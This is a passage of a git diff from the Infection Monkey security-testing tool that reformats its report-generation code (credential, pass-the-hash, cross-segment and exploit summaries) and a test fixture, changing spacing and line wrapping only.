+ "type":"shared_passwords_domain"
+ if user_info["domain_name"]
+ else "shared_passwords",
+ "machine":user_info["hostname"]
+ if user_info["hostname"]
+ else user_info["domain_name"],
+ "shared_with":[
+ PTHReportService.__build_dup_user_label(i) for i in group["cred_groups"]
+ ],
+ "is_local":False if user_info["domain_name"] else True,
+ }
)
return issues
@@ -140,23 +144,25 @@ class PTHReportService(object):
def get_shared_admins_nodes():
# This mongo queries users the best solution to figure out if an array
- # object has at least two objects in it, by making sure any value exists in the array index 1.
- # Excluding the name Administrator - its spamming the lists and not a surprise the domain Administrator account
+ # object has at least two objects in it, by making sure any value exists in the array
+ # index 1.
+ # Excluding the name Administrator - its spamming the lists and not a surprise the domain
+ # Administrator account
# is shared.
admins = mongo.db.groupsandusers.find(
- {
- "type": USERTYPE,
- "name": {"$ne": "Administrator"},
- "admin_on_machines.1": {"$exists": True},
- },
- {"admin_on_machines": 1, "name": 1, "domain_name": 1},
+ {
+ "type":USERTYPE,
+ "name":{"$ne":"Administrator"},
+ "admin_on_machines.1":{"$exists":True},
+ },
+ {"admin_on_machines":1, "name":1, "domain_name":1},
)
return [
{
- "name": admin["name"],
- "domain_name": admin["domain_name"],
- "admin_on_machines": PTHReportService.__get_admin_on_machines_format(
- admin["admin_on_machines"], admin["domain_name"]
+ "name":admin["name"],
+ "domain_name":admin["domain_name"],
+ "admin_on_machines":PTHReportService.__get_admin_on_machines_format(
+ admin["admin_on_machines"], admin["domain_name"]
),
}
for admin in admins
@@ -167,11 +173,11 @@ class PTHReportService(object):
admins_info = PTHReportService.get_shared_admins_nodes()
return [
{
- "is_local": False,
- "type": "shared_admins_domain",
- "machine": admin["domain_name"],
- "username": admin["domain_name"] + "\\" + admin["name"],
- "shared_machines": admin["admin_on_machines"],
+ "is_local":False,
+ "type":"shared_admins_domain",
+ "machine":admin["domain_name"],
+ "username":admin["domain_name"] + "\\" + admin["name"],
+ "shared_machines":admin["admin_on_machines"],
}
for admin in admins_info
]
@@ -186,14 +192,14 @@ class PTHReportService(object):
hostname = str(doc["critical_machine"]["hostname"])
if hostname not in crit_machines:
crit_machines[hostname] = {
- "threatening_users": [],
- "critical_services": doc["critical_machine"]["critical_services"],
+ "threatening_users":[],
+ "critical_services":doc["critical_machine"]["critical_services"],
}
crit_machines[hostname]["threatening_users"].append(
- {
- "name": str(doc["domain_name"]) + "\\" + str(doc["name"]),
- "creds_location": doc["secret_location"],
- }
+ {
+ "name":str(doc["domain_name"]) + "\\" + str(doc["name"]),
+ "creds_location":doc["secret_location"],
+ }
)
return crit_machines
@@ -203,10 +209,10 @@ class PTHReportService(object):
return [
{
- "type": "strong_users_on_crit",
- "machine": machine,
- "services": crit_machines[machine].get("critical_services"),
- "threatening_users": [
+ "type":"strong_users_on_crit",
+ "machine":machine,
+ "services":crit_machines[machine].get("critical_services"),
+ "threatening_users":[
i["name"] for i in crit_machines[machine]["threatening_users"]
],
}
@@ -221,15 +227,15 @@ class PTHReportService(object):
for user in crit_machines[machine]["threatening_users"]:
username = user["name"]
if username not in user_details:
- user_details[username] = {"machines": [], "services": []}
+ user_details[username] = {"machines":[], "services":[]}
user_details[username]["machines"].append(machine)
user_details[username]["services"] += crit_machines[machine]["critical_services"]
return [
{
- "username": user,
- "machines": user_details[user]["machines"],
- "services_names": user_details[user]["services"],
+ "username":user,
+ "machines":user_details[user]["machines"],
+ "services_names":user_details[user]["services"],
}
for user in user_details
]
@@ -240,11 +246,11 @@ class PTHReportService(object):
return [
{
- "id": monkey.guid,
- "label": "{0} : {1}".format(monkey.hostname, monkey.ip_addresses[0]),
- "group": "critical" if monkey.critical_services is not None else "normal",
- "services": monkey.critical_services,
- "hostname": monkey.hostname,
+ "id":monkey.guid,
+ "label":"{0} : {1}".format(monkey.hostname, monkey.ip_addresses[0]),
+ "group":"critical" if monkey.critical_services is not None else "normal",
+ "services":monkey.critical_services,
+ "hostname":monkey.hostname,
}
for monkey in monkeys
]
@@ -254,8 +260,8 @@ class PTHReportService(object):
edges_list = []
comp_users = mongo.db.groupsandusers.find(
- {"admin_on_machines": {"$ne": []}, "secret_location": {"$ne": []}, "type": USERTYPE},
- {"admin_on_machines": 1, "secret_location": 1},
+ {"admin_on_machines":{"$ne":[]}, "secret_location":{"$ne":[]}, "type":USERTYPE},
+ {"admin_on_machines":1, "secret_location":1},
)
for user in comp_users:
@@ -266,15 +272,15 @@ class PTHReportService(object):
if pair[0] != pair[1]
]:
edges_list.append(
- {"from": pair[1], "to": pair[0], "id": str(pair[1]) + str(pair[0])}
+ {"from":pair[1], "to":pair[0], "id":str(pair[1]) + str(pair[0])}
)
return edges_list
@staticmethod
def get_pth_map():
return {
- "nodes": PTHReportService.generate_map_nodes(),
- "edges": PTHReportService.generate_edges(),
+ "nodes":PTHReportService.generate_map_nodes(),
+ "edges":PTHReportService.generate_edges(),
}
@staticmethod
@@ -282,10 +288,10 @@ class PTHReportService(object):
pth_map = PTHReportService.get_pth_map()
PTHReportService.get_strong_users_on_critical_machines_nodes()
report = {
- "report_info": {
- "strong_users_table": PTHReportService.get_strong_users_on_crit_details()
+ "report_info":{
+ "strong_users_table":PTHReportService.get_strong_users_on_crit_details()
},
- "pthmap": {"nodes": pth_map.get("nodes"), "edges": pth_map.get("edges")},
+ "pthmap":{"nodes":pth_map.get("nodes"), "edges":pth_map.get("edges")},
}
return report
diff --git a/monkey/monkey_island/cc/services/reporting/report.py b/monkey/monkey_island/cc/services/reporting/report.py
index 87a99a2ad..92075a00f 100644
--- a/monkey/monkey_island/cc/services/reporting/report.py
+++ b/monkey/monkey_island/cc/services/reporting/report.py
@@ -22,13 +22,16 @@ from monkey_island.cc.services.configuration.utils import (
get_config_network_segments_as_subnet_groups,
)
from monkey_island.cc.services.node import NodeService
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_descriptor_enum import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing\
+ .exploiter_descriptor_enum import (
ExploiterDescriptorEnum,
)
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.cred_exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors\
+ .cred_exploit import (
CredentialType,
)
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit \
+ import (
ExploiterReportInfo,
)
from monkey_island.cc.services.reporting.pth_report import PTHReportService
@@ -52,17 +55,17 @@ class ReportService:
@staticmethod
def get_first_monkey_time():
return (
- mongo.db.telemetry.find({}, {"timestamp": 1})
- .sort([("$natural", 1)])
- .limit(1)[0]["timestamp"]
+ mongo.db.telemetry.find({}, {"timestamp":1})
+ .sort([("$natural", 1)])
+ .limit(1)[0]["timestamp"]
)
@staticmethod
def get_last_monkey_dead_time():
return (
- mongo.db.telemetry.find({}, {"timestamp": 1})
- .sort([("$natural", -1)])
- .limit(1)[0]["timestamp"]
+ mongo.db.telemetry.find({}, {"timestamp":1})
+ .sort([("$natural", -1)])
+ .limit(1)[0]["timestamp"]
)
@staticmethod
@@ -84,15 +87,15 @@ class ReportService:
def get_tunnels():
return [
{
- "type": "tunnel",
- "machine": NodeService.get_node_hostname(
- NodeService.get_node_or_monkey_by_id(tunnel["_id"])
+ "type":"tunnel",
+ "machine":NodeService.get_node_hostname(
+ NodeService.get_node_or_monkey_by_id(tunnel["_id"])
),
- "dest": NodeService.get_node_hostname(
- NodeService.get_node_or_monkey_by_id(tunnel["tunnel"])
+ "dest":NodeService.get_node_hostname(
+ NodeService.get_node_or_monkey_by_id(tunnel["tunnel"])
),
}
- for tunnel in mongo.db.monkey.find({"tunnel": {"$exists": True}}, {"tunnel": 1})
+ for tunnel in mongo.db.monkey.find({"tunnel":{"$exists":True}}, {"tunnel":1})
]
@staticmethod
@@ -104,10 +107,11 @@ class ReportService:
return [
{
- "type": "azure_password",
- "machine": machine,
- "users": set(
- [instance["username"] for instance in creds if instance["origin"] == machine]
+ "type":"azure_password",
+ "machine":machine,
+ "users":set(
+ [instance["username"] for instance in creds if
+ instance["origin"] == machine]
),
}
for machine in machines
@@ -122,14 +126,14 @@ class ReportService:
for node in nodes:
nodes_that_can_access_current_node = node["accessible_from_nodes_hostnames"]
formatted_nodes.append(
- {
- "label": node["label"],
- "ip_addresses": node["ip_addresses"],
- "accessible_from_nodes": nodes_that_can_access_current_node,
- "services": node["services"],
- "domain_name": node["domain_name"],
- "pba_results": node["pba_results"] if "pba_results" in node else "None",
- }
+ {
+ "label":node["label"],
+ "ip_addresses":node["ip_addresses"],
+ "accessible_from_nodes":nodes_that_can_access_current_node,
+ "services":node["services"],
+ "domain_name":node["domain_name"],
+ "pba_results":node["pba_results"] if "pba_results" in node else "None",
+ }
)
logger.info("Scanned nodes generated for reporting")
@@ -140,11 +144,11 @@ class ReportService:
def get_all_displayed_nodes():
nodes_without_monkeys = [
NodeService.get_displayed_node_by_id(node["_id"], True)
- for node in mongo.db.node.find({}, {"_id": 1})
+ for node in mongo.db.node.find({}, {"_id":1})
]
nodes_with_monkeys = [
NodeService.get_displayed_node_by_id(monkey["_id"], True)
- for monkey in mongo.db.monkey.find({}, {"_id": 1})
+ for monkey in mongo.db.monkey.find({}, {"_id":1})
]
nodes = nodes_without_monkeys + nodes_with_monkeys
return nodes
@@ -153,23 +157,23 @@ class ReportService:
def get_exploited():
exploited_with_monkeys = [
NodeService.get_displayed_node_by_id(monkey["_id"], True)
- for monkey in mongo.db.monkey.find({}, {"_id": 1})
+ for monkey in mongo.db.monkey.find({}, {"_id":1})
if not NodeService.get_monkey_manual_run(NodeService.get_monkey_by_id(monkey["_id"]))
]
exploited_without_monkeys = [
NodeService.get_displayed_node_by_id(node["_id"], True)
- for node in mongo.db.node.find({"exploited": True}, {"_id": 1})
+ for node in mongo.db.node.find({"exploited":True}, {"_id":1})
]
exploited = exploited_with_monkeys + exploited_without_monkeys
exploited = [
{
- "label": exploited_node["label"],
- "ip_addresses": exploited_node["ip_addresses"],
- "domain_name": exploited_node["domain_name"],
- "exploits": ReportService.get_exploits_used_on_node(exploited_node),
+ "label":exploited_node["label"],
+ "ip_addresses":exploited_node["ip_addresses"],
+ "domain_name":exploited_node["domain_name"],
+ "exploits":ReportService.get_exploits_used_on_node(exploited_node),
}
for exploited_node in exploited
]
@@ -181,13 +185,14 @@ class ReportService:
@staticmethod
def get_exploits_used_on_node(node: dict) -> List[str]:
return list(
- set(
- [
- ExploiterDescriptorEnum.get_by_class_name(exploit["exploiter"]).display_name
- for exploit in node["exploits"]
- if exploit["result"]
- ]
- )
+ set(
+ [
+ ExploiterDescriptorEnum.get_by_class_name(
+ exploit["exploiter"]).display_name
+ for exploit in node["exploits"]
+ if exploit["result"]
+ ]
+ )
)
@staticmethod
@@ -207,8 +212,8 @@ class ReportService:
def _get_credentials_from_system_info_telems():
formatted_creds = []
for telem in mongo.db.telemetry.find(
- {"telem_category": "system_info", "data.credentials": {"$exists": True}},
- {"data.credentials": 1, "monkey_guid": 1},
+ {"telem_category":"system_info", "data.credentials":{"$exists":True}},
+ {"data.credentials":1, "monkey_guid":1},
):
creds = telem["data"]["credentials"]
origin = NodeService.get_monkey_by_guid(telem["monkey_guid"])["hostname"]
@@ -219,8 +224,8 @@ class ReportService:
def _get_credentials_from_exploit_telems():
formatted_creds = []
for telem in mongo.db.telemetry.find(
- {"telem_category": "exploit", "data.info.credentials": {"$exists": True}},
- {"data.info.credentials": 1, "data.machine": 1, "monkey_guid": 1},
+ {"telem_category":"exploit", "data.info.credentials":{"$exists":True}},
+ {"data.info.credentials":1, "data.machine":1, "monkey_guid":1},
):
creds = telem["data"]["info"]["credentials"]
domain_name = telem["data"]["machine"]["domain_name"]
@@ -233,9 +238,9 @@ class ReportService:
def _format_creds_for_reporting(telem, monkey_creds, origin):
creds = []
CRED_TYPE_DICT = {
- "password": "Clear Password",
- "lm_hash": "LM hash",
- "ntlm_hash": "NTLM hash",
+ "password":"Clear Password",
+ "lm_hash":"LM hash",
+ "ntlm_hash":"NTLM hash",
}
if len(monkey_creds) == 0:
return []
@@ -248,9 +253,9 @@ class ReportService:
monkey_creds[user]["username"] if "username" in monkey_creds[user] else user
)
cred_row = {
- "username": username,
- "type": CRED_TYPE_DICT[cred_type],
- "origin": origin,
+ "username":username,
+ "type":CRED_TYPE_DICT[cred_type],
+ "origin":origin,
}
if cred_row not in creds:
creds.append(cred_row)
@@ -264,26 +269,26 @@ class ReportService:
"""
creds = []
for telem in mongo.db.telemetry.find(
- {"telem_category": "system_info", "data.ssh_info": {"$exists": True}},
- {"data.ssh_info": 1, "monkey_guid": 1},
+ {"telem_category":"system_info", "data.ssh_info":{"$exists":True}},
+ {"data.ssh_info":1, "monkey_guid":1},
):
origin = NodeService.get_monkey_by_guid(telem["monkey_guid"])["hostname"]
if telem["data"]["ssh_info"]:
# Pick out all ssh keys not yet included in creds
ssh_keys = [
{
- "username": key_pair["name"],
- "type": "Clear SSH private key",
- "origin": origin,
+ "username":key_pair["name"],
+ "type":"Clear SSH private key",
+ "origin":origin,
}
for key_pair in telem["data"]["ssh_info"]
if key_pair["private_key"]
- and {
- "username": key_pair["name"],
- "type": "Clear SSH private key",
- "origin": origin,
- }
- not in creds
+ and {
+ "username":key_pair["name"],
+ "type":"Clear SSH private key",
+ "origin":origin,
+ }
+ not in creds
]
creds.extend(ssh_keys)
return creds
@@ -296,15 +301,15 @@ class ReportService:
"""
creds = []
for telem in mongo.db.telemetry.find(
- {"telem_category": "system_info", "data.Azure": {"$exists": True}},
- {"data.Azure": 1, "monkey_guid": 1},
+ {"telem_category":"system_info", "data.Azure":{"$exists":True}},
+ {"data.Azure":1, "monkey_guid":1},
):
azure_users = telem["data"]["Azure"]["usernames"]
if len(azure_users) == 0:
continue
origin = NodeService.get_monkey_by_guid(telem["monkey_guid"])["hostname"]
azure_leaked_users = [
- {"username": user.replace(",", "."), "type": "Clear Password", "origin": origin}
+ {"username":user.replace(",", "."), "type":"Clear Password", "origin":origin}
for user in azure_users
]
creds.extend(azure_leaked_users)
@@ -323,14 +328,14 @@ class ReportService:
@staticmethod
def get_exploits() -> List[dict]:
query = [
- {"$match": {"telem_category": "exploit", "data.result": True}},
+ {"$match":{"telem_category":"exploit", "data.result":True}},
{
- "$group": {
- "_id": {"ip_address": "$data.machine.ip_addr"},
- "data": {"$first": "$$ROOT"},
+ "$group":{
+ "_id":{"ip_address":"$data.machine.ip_addr"},
+ "data":{"$first":"$$ROOT"},
}
},
- {"$replaceRoot": {"newRoot": "$data"}},
+ {"$replaceRoot":{"newRoot":"$data"}},
]
exploits = []
for exploit in mongo.db.telemetry.aggregate(query):
@@ -342,8 +347,8 @@ class ReportService:
@staticmethod
def get_monkey_subnets(monkey_guid):
network_info = mongo.db.telemetry.find_one(
- {"telem_category": "system_info", "monkey_guid": monkey_guid},
- {"data.network_info.networks": 1},
+ {"telem_category":"system_info", "monkey_guid":monkey_guid},
+ {"data.network_info.networks":1},
)
if network_info is None or not network_info["data"]:
return []
@@ -358,7 +363,7 @@ class ReportService:
issues = []
island_ips = local_ip_addresses()
for monkey in mongo.db.monkey.find(
- {"tunnel": {"$exists": False}}, {"tunnel": 1, "guid": 1, "hostname": 1}
+ {"tunnel":{"$exists":False}}, {"tunnel":1, "guid":1, "hostname":1}
):
found_good_ip = False
monkey_subnets = ReportService.get_monkey_subnets(monkey["guid"])
@@ -371,12 +376,12 @@ class ReportService:
break
if not found_good_ip:
issues.append(
- {
- "type": "island_cross_segment",
- "machine": monkey["hostname"],
- "networks": [str(subnet) for subnet in monkey_subnets],
- "server_networks": [str(subnet) for subnet in get_subnets()],
- }
+ {
+ "type":"island_cross_segment",
+ "machine":monkey["hostname"],
+ "networks":[str(subnet) for subnet in monkey_subnets],
+ "server_networks":[str(subnet) for subnet in get_subnets()],
+ }
)
return issues
@@ -384,15 +389,18 @@ class ReportService:
@staticmethod
def get_cross_segment_issues_of_single_machine(source_subnet_range, target_subnet_range):
"""
- Gets list of cross segment issues of a single machine. Meaning a machine has an interface for each of the
+ Gets list of cross segment issues of a single machine. Meaning a machine has an interface
+ for each of the
subnets.
- :param source_subnet_range: The subnet range which shouldn't be able to access target_subnet.
- :param target_subnet_range: The subnet range which shouldn't be accessible from source_subnet.
+ :param source_subnet_range: The subnet range which shouldn't be able to access
+ target_subnet.
+ :param target_subnet_range: The subnet range which shouldn't be accessible from
+ source_subnet.
:return:
"""
cross_segment_issues = []
- for monkey in mongo.db.monkey.find({}, {"ip_addresses": 1, "hostname": 1}):
+ for monkey in mongo.db.monkey.find({}, {"ip_addresses":1, "hostname":1}):
ip_in_src = None
ip_in_dst = None
for ip_addr in monkey["ip_addresses"]:
@@ -411,13 +419,13 @@ class ReportService:
if ip_in_dst:
cross_segment_issues.append(
- {
- "source": ip_in_src,
- "hostname": monkey["hostname"],
- "target": ip_in_dst,
- "services": None,
- "is_self": True,
- }
+ {
+ "source":ip_in_src,
+ "hostname":monkey["hostname"],
+ "target":ip_in_dst,
+ "services":None,
+ "is_self":True,
+ }
)
return cross_segment_issues
@@ -426,7 +434,8 @@ class ReportService:
def get_cross_segment_issues_per_subnet_pair(scans, source_subnet, target_subnet):
"""
Gets list of cross segment issues from source_subnet to target_subnet.
- :param scans: List of all scan telemetry entries. Must have monkey_guid, ip_addr and services.
+ :param scans: List of all scan telemetry entries. Must have monkey_guid,
+ ip_addr and services.
This should be a PyMongo cursor object.
:param source_subnet: The subnet which shouldn't be able to access target_subnet.
:param target_subnet: The subnet which shouldn't be accessible from source_subnet.
@@ -445,30 +454,31 @@ class ReportService:
if target_subnet_range.is_in_range(str(target_ip)):
monkey = NodeService.get_monkey_by_guid(scan["monkey_guid"])
cross_segment_ip = get_ip_in_src_and_not_in_dst(
- monkey["ip_addresses"], source_subnet_range, target_subnet_range
+ monkey["ip_addresses"], source_subnet_range, target_subnet_range
)
if cross_segment_ip is not None:
cross_segment_issues.append(
- {
- "source": cross_segment_ip,
- "hostname": monkey["hostname"],
- "target": target_ip,
- "services": scan["data"]["machine"]["services"],
- "icmp": scan["data"]["machine"]["icmp"],
- "is_self": False,
- }
+ {
+ "source":cross_segment_ip,
+ "hostname":monkey["hostname"],
+ "target":target_ip,
+ "services":scan["data"]["machine"]["services"],
+ "icmp":scan["data"]["machine"]["icmp"],
+ "is_self":False,
+ }
)
return cross_segment_issues + ReportService.get_cross_segment_issues_of_single_machine(
- source_subnet_range, target_subnet_range
+ source_subnet_range, target_subnet_range
)
@staticmethod
def get_cross_segment_issues_per_subnet_group(scans, subnet_group):
"""
Gets list of cross segment issues within given subnet_group.
- :param scans: List of all scan telemetry entries. Must have monkey_guid, ip_addr and services.
+ :param scans: List of all scan telemetry entries. Must have monkey_guid,
+ ip_addr and services.
This should be a PyMongo cursor object.
:param subnet_group: List of subnets which shouldn't be accessible from each other.
:return: Cross segment issues regarding the subnets in the group.
@@ -479,15 +489,15 @@ class ReportService:
source_subnet = subnet_pair[0]
target_subnet = subnet_pair[1]
pair_issues = ReportService.get_cross_segment_issues_per_subnet_pair(
- scans, source_subnet, target_subnet
+ scans, source_subnet, target_subnet
)
if len(pair_issues) != 0:
cross_segment_issues.append(
- {
- "source_subnet": source_subnet,
- "target_subnet": target_subnet,
- "issues": pair_issues,
- }
+ {
+ "source_subnet":source_subnet,
+ "target_subnet":target_subnet,
+ "issues":pair_issues,
+ }
)
return cross_segment_issues
@@ -495,13 +505,13 @@ class ReportService:
@staticmethod
def get_cross_segment_issues():
scans = mongo.db.telemetry.find(
- {"telem_category": "scan"},
- {
- "monkey_guid": 1,
- "data.machine.ip_addr": 1,
- "data.machine.services": 1,
- "data.machine.icmp": 1,
- },
+ {"telem_category":"scan"},
+ {
+ "monkey_guid":1,
+ "data.machine.ip_addr":1,
+ "data.machine.services":1,
+ "data.machine.icmp":1,
+ },
)
cross_segment_issues = []
@@ -511,7 +521,7 @@ class ReportService:
for subnet_group in subnet_groups:
cross_segment_issues += ReportService.get_cross_segment_issues_per_subnet_group(
- scans, subnet_group
+ scans, subnet_group
)
return cross_segment_issues
@@ -522,7 +532,7 @@ class ReportService:
PTHReportService.get_duplicated_passwords_issues,
PTHReportService.get_shared_admins_issues,
]
- issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, [])
+ issues = functools.reduce(lambda acc, issue_gen:acc + issue_gen(), ISSUE_GENERATORS, [])
domain_issues_dict = {}
for issue in issues:
if not issue.get("is_local", True):
@@ -539,7 +549,7 @@ class ReportService:
@staticmethod
def get_machine_aws_instance_id(hostname):
aws_instance_id_list = list(
- mongo.db.monkey.find({"hostname": hostname}, {"aws_instance_id": 1})
+ mongo.db.monkey.find({"hostname":hostname}, {"aws_instance_id":1})
)
if aws_instance_id_list:
if "aws_instance_id" in aws_instance_id_list[0]:
@@ -551,7 +561,7 @@ class ReportService:
def get_manual_monkeys():
return [
monkey["hostname"]
- for monkey in mongo.db.monkey.find({}, {"hostname": 1, "parent": 1, "guid": 1})
+ for monkey in mongo.db.monkey.find({}, {"hostname":1, "parent":1, "guid":1})
if NodeService.get_monkey_manual_run(monkey)
]
@@ -605,29 +615,29 @@ class ReportService:
@staticmethod
def _is_weak_credential_issue(
- issue: dict, config_usernames: List[str], config_passwords: List[str]
+ issue: dict, config_usernames: List[str], config_passwords: List[str]
) -> bool:
# Only credential exploiter issues have 'credential_type'
return (
- "credential_type" in issue
- and issue["credential_type"] == CredentialType.PASSWORD.value
- and issue["password"] in config_passwords
- and issue["username"] in config_usernames
+ "credential_type" in issue
+ and issue["credential_type"] == CredentialType.PASSWORD.value
+ and issue["password"] in config_passwords
+ and issue["username"] in config_usernames
)
@staticmethod
def _is_stolen_credential_issue(issue: dict) -> bool:
# Only credential exploiter issues have 'credential_type'
return "credential_type" in issue and (
- issue["credential_type"] == CredentialType.PASSWORD.value
- or issue["credential_type"] == CredentialType.HASH.value
+ issue["credential_type"] == CredentialType.PASSWORD.value
+ or issue["credential_type"] == CredentialType.HASH.value
)
@staticmethod
def _is_zerologon_pass_restore_failed(issue: dict):
return (
- issue["type"] == ExploiterDescriptorEnum.ZEROLOGON.value.class_name
- and not issue["password_restored"]
+ issue["type"] == ExploiterDescriptorEnum.ZEROLOGON.value.class_name
+ and not issue["password_restored"]
)
@staticmethod
@@ -648,30 +658,30 @@ class ReportService:
scanned_nodes = ReportService.get_scanned()
exploited_nodes = ReportService.get_exploited()
report = {
- "overview": {
- "manual_monkeys": ReportService.get_manual_monkeys(),
- "config_users": config_users,
- "config_passwords": config_passwords,
- "config_exploits": ReportService.get_config_exploits(),
- "config_ips": ReportService.get_config_ips(),
- "config_scan": ReportService.get_config_scan(),
- "monkey_start_time": ReportService.get_first_monkey_time().strftime(
- "%d/%m/%Y %H:%M:%S"
+ "overview":{
+ "manual_monkeys":ReportService.get_manual_monkeys(),
+ "config_users":config_users,
+ "config_passwords":config_passwords,
+ "config_exploits":ReportService.get_config_exploits(),
+ "config_ips":ReportService.get_config_ips(),
+ "config_scan":ReportService.get_config_scan(),
+ "monkey_start_time":ReportService.get_first_monkey_time().strftime(
+ "%d/%m/%Y %H:%M:%S"
),
- "monkey_duration": ReportService.get_monkey_duration(),
- "issues": issue_set,
- "cross_segment_issues": cross_segment_issues,
+ "monkey_duration":ReportService.get_monkey_duration(),
+ "issues":issue_set,
+ "cross_segment_issues":cross_segment_issues,
},
- "glance": {
- "scanned": scanned_nodes,
- "exploited": exploited_nodes,
- "stolen_creds": ReportService.get_stolen_creds(),
- "azure_passwords": ReportService.get_azure_creds(),
- "ssh_keys": ReportService.get_ssh_keys(),
- "strong_users": PTHReportService.get_strong_users_on_crit_details(),
+ "glance":{
+ "scanned":scanned_nodes,
+ "exploited":exploited_nodes,
+ "stolen_creds":ReportService.get_stolen_creds(),
+ "azure_passwords":ReportService.get_azure_creds(),
+ "ssh_keys":ReportService.get_ssh_keys(),
+ "strong_users":PTHReportService.get_strong_users_on_crit_details(),
},
- "recommendations": {"issues": issues, "domain_issues": domain_issues},
- "meta": {"latest_monkey_modifytime": monkey_latest_modify_time},
+ "recommendations":{"issues":issues, "domain_issues":domain_issues},
+ "meta":{"latest_monkey_modifytime":monkey_latest_modify_time},
}
ReportExporterManager().export(report)
mongo.db.report.drop()
@@ -690,7 +700,7 @@ class ReportService:
PTHReportService.get_strong_users_on_crit_issues,
]
- issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, [])
+ issues = functools.reduce(lambda acc, issue_gen:acc + issue_gen(), ISSUE_GENERATORS, [])
issues_dict = {}
for issue in issues:
@@ -708,7 +718,8 @@ class ReportService:
@staticmethod
def encode_dot_char_before_mongo_insert(report_dict):
"""
- mongodb doesn't allow for '.' and '$' in a key's name, this function replaces the '.' char with the unicode
+ mongodb doesn't allow for '.' and '$' in a key's name, this function replaces the '.'
+ char with the unicode
,,, combo instead.
:return: dict with formatted keys with no dots.
"""
@@ -719,9 +730,10 @@ class ReportService:
def is_latest_report_exists():
"""
This function checks if a monkey report was already generated and if it's the latest one.
- :return: True if report is the latest one, False if there isn't a report or its not the latest.
+ :return: True if report is the latest one, False if there isn't a report or its not the
+ latest.
"""
- latest_report_doc = mongo.db.report.find_one({}, {"meta.latest_monkey_modifytime": 1})
+ latest_report_doc = mongo.db.report.find_one({}, {"meta.latest_monkey_modifytime":1})
if latest_report_doc:
report_latest_modifytime = latest_report_doc["meta"]["latest_monkey_modifytime"]
@@ -739,7 +751,7 @@ class ReportService:
delete_result = mongo.db.report.delete_many({})
if mongo.db.report.count_documents({}) != 0:
raise RuntimeError(
- "Report cache not cleared. DeleteResult: " + delete_result.raw_result
+ "Report cache not cleared. DeleteResult: " + delete_result.raw_result
)
@staticmethod
@@ -760,8 +772,9 @@ class ReportService:
@staticmethod
def did_exploit_type_succeed(exploit_type):
return (
- mongo.db.edge.count(
- {"exploits": {"$elemMatch": {"exploiter": exploit_type, "result": True}}}, limit=1
- )
- > 0
+ mongo.db.edge.count(
+ {"exploits":{"$elemMatch":{"exploiter":exploit_type, "result":True}}},
+ limit=1
+ )
+ > 0
)
diff --git a/monkey/monkey_island/cc/services/reporting/report_generation_synchronisation.py b/monkey/monkey_island/cc/services/reporting/report_generation_synchronisation.py
index dec13e6d6..38f7ee9cb 100644
--- a/monkey/monkey_island/cc/services/reporting/report_generation_synchronisation.py
+++ b/monkey/monkey_island/cc/services/reporting/report_generation_synchronisation.py
@@ -4,8 +4,10 @@ from gevent.lock import BoundedSemaphore
logger = logging.getLogger(__name__)
-# These are pseudo-singletons - global Locks. These locks will allow only one thread to generate a report at a time.
-# Report generation can be quite slow if there is a lot of data, and the UI queries the Root service often; without
+# These are pseudo-singletons - global Locks. These locks will allow only one thread to generate
+# a report at a time.
+# Report generation can be quite slow if there is a lot of data, and the UI queries the Root
+# service often; without
# the locks, these requests would accumulate, overload the server, eventually causing it to crash.
logger.debug("Initializing report generation locks.")
__report_generating_lock = BoundedSemaphore()
diff --git a/monkey/monkey_island/cc/services/reporting/test_report.py b/monkey/monkey_island/cc/services/reporting/test_report.py
index cf446c757..89b08fd11 100644
--- a/monkey/monkey_island/cc/services/reporting/test_report.py
+++ b/monkey/monkey_island/cc/services/reporting/test_report.py
@@ -4,41 +4,41 @@ from copy import deepcopy
from monkey_island.cc.services.reporting.report import ReportService
NODE_DICT = {
- "id": "602f62118e30cf35830ff8e4",
- "label": "WinDev2010Eval.mshome.net",
- "group": "monkey_windows",
- "os": "windows",
- "dead": True,
- "exploits": [
+ "id":"602f62118e30cf35830ff8e4",
+ "label":"WinDev2010Eval.mshome.net",
+ "group":"monkey_windows",
+ "os":"windows",
+ "dead":True,
+ "exploits":[
{
- "result": True,
- "exploiter": "DrupalExploiter",
- "info": {
- "display_name": "Drupal Server",
- "started": datetime.datetime(2021, 2, 19, 9, 0, 14, 950000),
- "finished": datetime.datetime(2021, 2, 19, 9, 0, 14, 950000),
- "vulnerable_urls": [],
- "vulnerable_ports": [],
- "executed_cmds": [],
+ "result":True,
+ "exploiter":"DrupalExploiter",
+ "info":{
+ "display_name":"Drupal Server",
+ "started":datetime.datetime(2021, 2, 19, 9, 0, 14, 950000),
+ "finished":datetime.datetime(2021, 2, 19, 9, 0, 14, 950000),
+ "vulnerable_urls":[],
+ "vulnerable_ports":[],
+ "executed_cmds":[],
},
- "attempts": [],
- "timestamp": datetime.datetime(2021, 2, 19, 9, 0, 14, 984000),
- "origin": "MonkeyIsland : 192.168.56.1",
+ "attempts":[],
+ "timestamp":datetime.datetime(2021, 2, 19, 9, 0, 14, 984000),
+ "origin":"MonkeyIsland : 192.168.56.1",
},
{
- "result": True,
- "exploiter": "ElasticGroovyExploiter",
- "info": {
- "display_name": "Elastic search",
- "started": datetime.datetime(2021, 2, 19, 9, 0, 15, 16000),
- "finished": datetime.datetime(2021, 2, 19, 9, 0, 15, 17000),
- "vulnerable_urls": [],
- "vulnerable_ports": [],
- "executed_cmds": [],
+ "result":True,
+ "exploiter":"ElasticGroovyExploiter",
+ "info":{
+ "display_name":"Elastic search",
+ "started":datetime.datetime(2021, 2, 19, 9, 0, 15, 16000),
+ "finished":datetime.datetime(2021, 2, 19, 9, 0, 15, 17000),
+ "vulnerable_urls":[],
+ "vulnerable_ports":[],
+ "executed_cmds":[],
},
- "attempts": [],
- "timestamp": datetime.datetime(2021, 2, 19, 9, 0, 15, 60000),
- "origin": "MonkeyIsland : 192.168.56.1",
+ "attempts":[],
+ "timestamp":datetime.datetime(2021, 2, 19, 9, 0, 15, 60000),
+ "origin":"MonkeyIsland : 192.168.56.1",
},
],
}
diff --git a/monkey/monkey_island/cc/services/representations_test.py b/monkey/monkey_island/cc/services/representations_test.py
index 8aadc0bed..be622b612 100644
